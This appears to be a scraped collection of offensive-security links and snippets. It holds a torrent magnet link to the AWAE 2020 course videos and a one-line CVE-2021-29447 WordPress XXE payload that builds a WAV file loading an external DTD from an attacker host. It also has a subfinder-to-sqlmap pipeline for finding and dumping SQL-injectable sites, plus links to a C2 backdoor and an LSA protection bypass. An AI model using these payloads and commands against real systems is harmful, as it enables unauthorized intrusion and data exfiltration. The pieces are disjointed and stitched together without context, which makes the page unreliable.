Advanced Web Attacks and Exploitation 2020
about
https://www.offensive-security.com/offsec/awae-2020-update/
https://www.exploit-db.com/advanced-web-attacks
magnet:?xt=urn:btih:2ED593EA8EEA4AC9A39B30B07A7C45E788D78068&dn=AWAE%20Video%202020&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337%2fannounce
OffSec
AWAE: Updated with More Content for 2020 | OffSec
The Advanced Web Attacks and Exploitation (AWAE) course has been updated for 2020. Learn what changed, why we did it, and how it will help you.
Now might be a good time to make sure you have local copies of all the offensive security tools on GitHub
CVE-2021-29447 #WordPress XXE: you don't need a wave file to set iXML metadata! bash:
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://attacker/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
find sql injection
subfinder -d target | tee -a domains
cat domains | httpx | tee -a alive.txt
cat alive.txt | waybackurls | tee -a urls
gf sqli urls >> sqli
sqlmap -m sqli --dbs --batch
happy hacking
GitHub - Cr4sh/MicroBackdoor: Small and convenient C2 tool for Windows targets
https://github.com/Cr4sh/MicroBackdoor
Bypassing LSA Protection in Userland – Sec Team Blog
https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/
GitHub - Porchetta-Industries/pyMalleableC2: Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically.
https://github.com/Porchetta-Industries/pyMalleableC2
Weird Ways to Run Unmanaged Code in .NET - XPN InfoSec Blog
https://blog.xpnsec.com/weird-ways-to-execute-dotnet/
XPN InfoSec Blog
@_xpn_ - Weird Ways to Run Unmanaged Code in .NET
Recently I've been looking at the .NET CLR internals and wanted to understand what further techniques may be available for executing unmanaged code from the managed runtime. This post contains a snippet of some of the weird techniques that I found.
A tcpdump Tutorial with Examples — 50 Ways to Isolate Traffic | Daniel Miessler
https://danielmiessler.com/study/tcpdump/
Danielmiessler
A tcpdump Tutorial with Examples
tcpdump is the world's premier network analysis tool—combining both power and simplicity into a single command-line interface. This guide will show